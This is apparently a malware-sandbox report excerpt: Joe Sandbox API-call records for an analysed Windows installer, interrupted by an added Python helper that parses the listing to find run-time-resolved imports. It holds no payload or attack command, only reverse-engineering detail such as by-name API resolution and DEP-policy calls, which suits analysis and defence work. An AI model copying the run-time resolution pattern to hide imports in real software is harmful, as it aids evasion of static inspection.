                                                                                      • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                      • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                      • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                      • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                      • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                      • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                      • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                      • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                      • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                      • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                      • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                      • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                      • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                      • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                      • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                      • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                      • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                      • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                      • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                      • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                      • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                    • String ID: Setup
                                                                                    • API String ID: 291738113-3839654196
                                                                                    • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                    • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                                    • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                    • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
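The function record above is dominated by GetModuleHandleA / GetProcAddress pairs that resolve exports (SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy, Wow64DisableWow64FsRedirection, VerifyVersionInfoW and others) by name at run time, so they never appear in the static import table. The following Python is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the "APIs" listing format shown on this page, pulls out the names passed to the resolver APIs, and separately lists calls the plugin could only name by address (the `73A0A570.USER32` style entries). The line format is inferred from the listing itself, and the handling of names that land on the neighbouring GetModuleHandleA line instead of the GetProcAddress line (as NotifyWinEvent does above) is an assumption about the plugin's stack-argument recovery, not a documented behaviour. The sample input is copied from the listing above.

```python
import re

# One line of a Joe Sandbox "APIs" listing, in the three shapes seen on this page:
#   • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
#   • GetCurrentThreadId.KERNEL32 ref: 004109B2
#   • 73A0A570.USER32(00000000,?,?), ref: 0042312E      (target known only by address)
# Format inferred from the listing; the bullet and the subcall prefix are optional.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[0-9A-Za-z_]+)\.(?P<module>[0-9A-Za-z_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32 = re.compile(r"[0-9A-F]{8}")
# APIs whose string arguments name a library or an export resolved at run time
RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
             "LoadLibraryA", "LoadLibraryW"}


def parse_api_lines(text):
    """Parse listing lines into dicts; lines that are not API calls are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": raw.split(",") if raw else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),  # None when the call sits in the listed function itself
        })
    return records


def _looks_like_symbol(tok):
    # The plugin prints stack slots as 8-digit hex, '?' for unknown values and
    # '<name>.dll' for library names; anything else is a candidate export name.
    return tok != "?" and not HEX32.fullmatch(tok) and not tok.lower().endswith(".dll")


def resolved_api_names(records):
    """Export names passed to the resolver APIs, deduplicated and sorted.

    Assumption: the plugin's argument recovery is heuristic, so a name can be
    printed on the adjacent GetModuleHandleA line rather than on GetProcAddress
    (NotifyWinEvent in the sample). Taking the union over all resolver calls
    catches both placements at the cost of occasionally including a library name
    argument that is not an export (filtered here by the '.dll' suffix).
    """
    names = set()
    for r in records:
        if r["api"] in RESOLVERS:
            names.update(t for t in r["args"] if _looks_like_symbol(t))
    return sorted(names)


def unresolved_calls(records):
    """Calls whose callee the plugin could only name by address (unlabelled thunk)."""
    return [(r["api"], r["module"], r["ref"]) for r in records if HEX32.fullmatch(r["api"])]


# Sample input: ten lines copied from the listing on this page.
SAMPLE = """\
• Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
• Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
• Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
• Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
• Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
• Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
• Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
• Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
• SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
• 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
"""
SAMPLE_RECORDS = parse_api_lines(SAMPLE)

if __name__ == "__main__":
    print("resolved at run time:", resolved_api_names(SAMPLE_RECORDS))
    print("named only by address:", unresolved_calls(SAMPLE_RECORDS))
```

Run it over the whole "APIs" section of a report to get the dynamically resolved import set in one pass; names that the plugin only shows via a neighbouring line are still caught, while library-name arguments and unknown stack slots are dropped.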
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                    • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A15940CurrentThread
                                                                                    • String ID: RzE
                                                                                    • API String ID: 1959240892-1126107055
                                                                                    • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                    • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                    • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                    • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                    • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                                    • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                    • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                    • String ID: CreateFile
                                                                                    • API String ID: 2528220319-823142352
                                                                                    • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                    • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                                    • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                    • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                                    APIs
                                                                                      • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                    • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                    • API String ID: 2906209438-2320870614
                                                                                    • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                    • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                                    • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                    • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                                    APIs
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLibraryLoadModeProc
                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                    • API String ID: 2492108670-2683653824
                                                                                    • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                    • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                                    • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                    • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Append$System
                                                                                    • String ID:
                                                                                    • API String ID: 1489644407-0
                                                                                    • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                    • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                                    • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                    • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                                    • 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A480A570ObjectSelect
                                                                                    • String ID:
                                                                                    • API String ID: 1230475511-0
                                                                                    • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                    • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                                    • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                    • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                                    • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                                    • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 65125430-0
                                                                                    • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                    • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                                    • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                    • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                                    APIs
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                    • TranslateMessage.USER32(?), ref: 0042449F
                                                                                    • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                    • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                    • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                    • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                    APIs
                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                    • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Prop$Window
                                                                                    • String ID:
                                                                                    • API String ID: 3363284559-0
                                                                                    • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                    • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                                    • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                    • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                    • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                    • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableEnabledVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3234591441-0
                                                                                    • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                    • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                                    • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                    • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                                    APIs
                                                                                    • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow
                                                                                    • String ID: InitializeWizard
                                                                                    • API String ID: 2558294473-2356795471
                                                                                    • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
